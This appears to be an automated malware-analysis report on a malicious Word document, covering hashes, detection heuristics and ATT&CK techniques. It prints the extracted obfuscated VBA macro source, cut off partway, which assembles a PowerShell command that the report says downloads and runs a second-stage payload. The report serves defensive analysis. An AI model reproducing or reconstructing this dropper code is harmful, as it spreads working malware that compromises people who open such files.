Office (OLE) malware analysis — malicious · 0e99c26de560c4ec

MALICIOUS

Office (OLE)

97.5 KB Created: 2018-06-20 16:58:00 Authoring application: Microsoft Office Word First seen: 2018-07-18

MD5: 0d6da12f4fceb53d3f8981ba240444b6 SHA-1: 6b4c6960f465b05147ab1c725a57d14c12b314e8 SHA-256: 0e99c26de560c4ec633ca9287d3a92a08bc16bce0b330f4d7f2f31d28cc8fa02

242 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro executes a Shell() call, which is used to construct and run a PowerShell command. This command appears to be designed to download and execute a second-stage payload from a heavily obfuscated string. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6585018-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6585018-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11484 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11484 bytes
SHA-256: `501cdf5c7c991ccd04b633a56757deec924f9d2d91f13470cd088b6e90cce831`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IFXRNqtz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "LbwcJFwT" Function EDaTqlzhW() On Error Resume Next lzSDjT = CDate(dklACN + Sin(21671 + 51402) * 79117 * CInt(93264)) jkGKN = KSfOLj kuiEC = 9589 Hirrw = CByte(qrXnu) hiOTZ = 79677 NCDrw = CDate(42789) EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s' " zrAzQ = CDate(IWjEH + Sin(29613 + 48149) * 72560 * CInt(59865)) wZWRwh = oImwkv KYOaGG = 43186 jAnNHj = CByte(lhalj) CXDQh = 17164 OnTRDi = CDate(36691) NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7" IDWpl = CDate(pJjjWK + Sin(84016 + 35851) * 38305 * CInt(54364)) pYKBt = KZWLc NqjHPA = 42815 RTcIsS = CByte(MBXRwM) ocUtFL = 47120 iEXbYB = CDate(69809) abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15" QmGvq = CDate(IdnKCf + Sin(64870 + 44148) * 45162 * CInt(642)) oQuqUv = kanSXJ DhvXrq = 70821 CzLkvY = CByte(dZKOnM) wjamM = 9322 OXNas = CDate(8968) luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74" zHkKv = CDate(jrUqh + Sin(91473 + 69786) * 53849 * CInt(91526)) bAofVV = pVvip FYZAmz = 24329 isrXV = CByte(cKLwrJ) kvIGI = 18445 QLpFd = CDate(86813) brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@" svpAZt = CDate(58757) uYpbSY = CDate(vZXdkj + Sin(87061 + 52093) * 48675 * CInt(41342)) HjbRC = 71434 VOvZiU = CByte(NEoNi) GFapG = 95927 UvWqUt = jdMqbs litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@" muaFw = CDate(58732) iaSlS = CDate(iZSEL + Sin(5209 + 18238) * 55583 * CInt(67434)) vdRfR = 68586 zzTQii = CByte(iNDEw) MhnOT = 43036 sawOjX = WlKwiA iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7" HaAYPr = CDate(57153) uJMzJ = CDate(oPkHhd + Sin(68581 + 46356) * 46861 * CInt(52339)) izHzzQ = 18014 BmYDQh = CByte(BQlGjv) RPmrO = 81450 VhfWdN = ljpjwb ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k" EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW End Function Function iwTjjPcLoSw() On Error Resume Next LamIQ = CDate(17565) QOzjJ = CDate(QzfSVc + Sin(28970 + 70851) * 37046 * CInt(36441)) XCNAB = 96752 RQjCZ = CByte(uJwsRw) PEksrl = 5914 dZmGH = taSQH LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k" GqUJA = CDate(30150) lkXzQ = CDate(CkkOJ + Sin(56258 + 71856) * 43465 * CInt(70433)) DtoXz = 58497 WpjpsI = CByte(irWAIz) UOwOR = 71473 bOojas = qcFOz wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9" sOhWLm = CDate(10271) QAMOTl = CDate(clmhEj + Sin(73306 + 26909) * 97132 * CInt(95491)) JpcHi = 88061 HrfMh = CByte(EtuLj) YLqHf = 32371 jbzaUl = isqbTR ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91" psoARV = CDate(22475) UvGSjz = CDate(kVSNHG + Sin(43994 + 72852) * 81784 * CInt(85924)) wqcHHi = 53391 GAiYS = CByte(dkpfa) mSvmKt = 31197 wQvaAc = kDDCb KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1" wwhiu = CDate(54839) oKkbwc = CDate(jvCLd + Sin(18823 + 72631) * 20120 * CInt(71064)) SUsPXS = 37205 SHzIW = CByte(vkuvi) VuriP = 65425 ESTQXK = PPCvWm bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10" hZHJI = CDate(84566) iSHvCQ = CDate(nAaXc + Sin(16763 + 94315) * 89875 * CInt(51329)) BfTqzi = 67823 UblLl = CByte(bIKRzs) jqqtj = 4813 LBjul = MPpTTF srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111 ... (truncated)

SHA-256: 501cdf5c7c991ccd04b633a56757deec924f9d2d91f13470cd088b6e90cce831

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IFXRNqtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LbwcJFwT"
Function EDaTqlzhW()
On Error Resume Next
lzSDjT = CDate(dklACN + Sin(21671 + 51402) * 79117 * CInt(93264))
jkGKN = KSfOLj
kuiEC = 9589
Hirrw = CByte(qrXnu)
hiOTZ = 79677
NCDrw = CDate(42789)
EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s'  "
zrAzQ = CDate(IWjEH + Sin(29613 + 48149) * 72560 * CInt(59865))
wZWRwh = oImwkv
KYOaGG = 43186
jAnNHj = CByte(lhalj)
CXDQh = 17164
OnTRDi = CDate(36691)
NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7"
IDWpl = CDate(pJjjWK + Sin(84016 + 35851) * 38305 * CInt(54364))
pYKBt = KZWLc
NqjHPA = 42815
RTcIsS = CByte(MBXRwM)
ocUtFL = 47120
iEXbYB = CDate(69809)
abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15"
QmGvq = CDate(IdnKCf + Sin(64870 + 44148) * 45162 * CInt(642))
oQuqUv = kanSXJ
DhvXrq = 70821
CzLkvY = CByte(dZKOnM)
wjamM = 9322
OXNas = CDate(8968)
luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74"
zHkKv = CDate(jrUqh + Sin(91473 + 69786) * 53849 * CInt(91526))
bAofVV = pVvip
FYZAmz = 24329
isrXV = CByte(cKLwrJ)
kvIGI = 18445
QLpFd = CDate(86813)
brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@"
svpAZt = CDate(58757)
uYpbSY = CDate(vZXdkj + Sin(87061 + 52093) * 48675 * CInt(41342))
HjbRC = 71434
VOvZiU = CByte(NEoNi)
GFapG = 95927
UvWqUt = jdMqbs
litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@"
muaFw = CDate(58732)
iaSlS = CDate(iZSEL + Sin(5209 + 18238) * 55583 * CInt(67434))
vdRfR = 68586
zzTQii = CByte(iNDEw)
MhnOT = 43036
sawOjX = WlKwiA
iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7"
HaAYPr = CDate(57153)
uJMzJ = CDate(oPkHhd + Sin(68581 + 46356) * 46861 * CInt(52339))
izHzzQ = 18014
BmYDQh = CByte(BQlGjv)
RPmrO = 81450
VhfWdN = ljpjwb
ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k"
EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW
End Function
Function iwTjjPcLoSw()
On Error Resume Next
LamIQ = CDate(17565)
QOzjJ = CDate(QzfSVc + Sin(28970 + 70851) * 37046 * CInt(36441))
XCNAB = 96752
RQjCZ = CByte(uJwsRw)
PEksrl = 5914
dZmGH = taSQH
LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k"
GqUJA = CDate(30150)
lkXzQ = CDate(CkkOJ + Sin(56258 + 71856) * 43465 * CInt(70433))
DtoXz = 58497
WpjpsI = CByte(irWAIz)
UOwOR = 71473
bOojas = qcFOz
wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9"
sOhWLm = CDate(10271)
QAMOTl = CDate(clmhEj + Sin(73306 + 26909) * 97132 * CInt(95491))
JpcHi = 88061
HrfMh = CByte(EtuLj)
YLqHf = 32371
jbzaUl = isqbTR
ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91"
psoARV = CDate(22475)
UvGSjz = CDate(kVSNHG + Sin(43994 + 72852) * 81784 * CInt(85924))
wqcHHi = 53391
GAiYS = CByte(dkpfa)
mSvmKt = 31197
wQvaAc = kDDCb
KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1"
wwhiu = CDate(54839)
oKkbwc = CDate(jvCLd + Sin(18823 + 72631) * 20120 * CInt(71064))
SUsPXS = 37205
SHzIW = CByte(vkuvi)
VuriP = 65425
ESTQXK = PPCvWm
bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10"
hZHJI = CDate(84566)
iSHvCQ = CDate(nAaXc + Sin(16763 + 94315) * 89875 * CInt(51329))
BfTqzi = 67823
UblLl = CByte(bIKRzs)
jqqtj = 4813
LBjul = MPpTTF
srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.